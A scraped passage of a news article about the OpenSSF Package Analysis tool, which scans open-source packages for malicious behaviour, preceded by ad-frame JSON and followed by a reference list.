{"uid":0.019858986628669584,"hostPeerN
ame":"https://amp.thehackernews.com","initialGeometry":"{\"windowCoords
_t\":0,\"windowCoords_r\":432,\"windowCoords_b\":812,\"windowCoords_l\"
:0,\"frameCoords_t\":1080,\"frameCoords_r\":728,\"frameCoords_b\":1848,
\"frameCoords_l\":-296,\"posCoords_t\":1080,\"posCoords_b\":1848,\"posC
oords_r\":728,\"posCoords_l\":-296,\"styleZIndex\":\"\",\"allowedExpans
ion_r\":-592,\"allowedExpansion_b\":44,\"allowedExpansion_t\":0,\"allow
edExpansion_l\":0,\"yInView\":0,\"xInView\":0.7109375}","permissions":"
{\"expandByOverlay\":true,\"expandByPush\":true,\"readCookie\":false,\"
writeCookie\":false}","metadata":"{\"shared\":{\"sf_ver\":\"1-0-38\",\"
ck_on\":1,\"flash_ver\":\"26.0.0\",\"canonical_url\":\"https://thehacke
rnews.com/2022/05/heres-new-tool-that-scans-for-malicious.html\",\"amp\
":{\"canonical_url\":\"https://thehackernews.com/2022/05/heres-new-tool
-that-scans-for-malicious.html\"}}}","reportCreativeGeometry":false,"is
DifferentSourceWindow":false,"sentinel":"0-8237909713426068860","width"
:336,"height":280,"_context":{"ampcontextVersion":"2204221712000","ampc
ontextFilepath":"https://3p.ampproject.net/2204221712000/ampcontext-v0.
js","sourceUrl":"https://amp.thehackernews.com/thn/2022/05/heres-new-to
ol-that-scans-for-malicious.html","referrer":"https://www.google.com/",
"canonicalUrl":"https://thehackernews.com/2022/05/heres-new-tool-that-s
cans-for-malicious.html","pageViewId":"2647","location":{"href":"https:
//amp.thehackernews.com/thn/2022/05/heres-new-tool-that-scans-for-malic
ious.html"},"startTime":1651739310359,"tagName":"AMP-AD","mode":{"local
Dev":false,"development":false,"esm":false,"test":false,"rtvVersion":"0
12204221712000"},"canary":false,"hidden":false,"initialLayoutRect":{"le
ft":48,"top":1324,"width":336,"height":280},"domFingerprint":"336971348
7","experimentToggles":{"canary":false,"a4aProfilingRate":false,"double
clickSraExp":false,"doubleclickSraReportExcludedBlock":false,"flexAdSlo
ts":false,"flexible-bitrate":false,"ios-fixed-no-transfer":false,"story
-ad-placements":false,"story-disable-animations-first-page":true,"story
-load-inactive-outside-viewport":true,"amp-sticky-ad-to-amp-ad-v4":fals
e,"amp-story-first-page-max-bitrate":false,"story-load-first-page-only"
:true,"story-ad-page-outlink":false,"amp-geo-ssr":true},"sentinel":"0-8
237909713426068860"},"initialIntersection":{"time":1341.9000000059605,"
rootBounds":{"left":0,"top":0,"width":432,"height":812,"bottom":812,"ri
ght":432,"x":0,"y":0},"boundingClientRect":{"left":48,"top":1324,"width
":336,"height":280,"bottom":1604,"right":384,"x":48,"y":1324},"intersec
tionRect":{"left":0,"top":0,"width":0,"height":0,"bottom":0,"right":0,"
x":0,"y":0},"intersectionRatio":0}}
"The Package Analysis project seeks to understand the behavior and
capabilities of packages available on open source repositories: what
files do they access, what addresses do they connect to, and what
commands do they run?," the OpenSSF [4]said.
"The project also tracks changes in how packages behave over time, to
identify when previously safe software begins acting suspiciously," the
foundation's Caleb Brown and David A. Wheeler added.
In a test run that lasted a month, the tool identified more than [5]200
malicious packages uploaded to PyPI and NPM, with a majority of the
rogue libraries leveraging [6]dependency
confusion and [7]typosquatting attacks.
References
1. https://thehackernews.com/2022/05/heres-new-tool-that-scans-for-malicious.html
2. https://github.com/ossf/package-analysis
3. https://5d5c7eaec5d4ff8f08789eeeb2fe5d47.safeframe.googlesyndication.com/safeframe/1-0-38/html/container.html?n=0
4. https://openssf.org/blog/2022/04/28/introducing-package-analysis-scanning-open-source-packages-for-malicious-behavior/
5. https://github.com/ossf/package-analysis/blob/main/docs/case_studies.md
6. https://thehackernews.com/2021/02/dependency-confusion-supply-chain.html
7. https://thehackernews.com/2022/02/25-malicious-javascript-libraries.html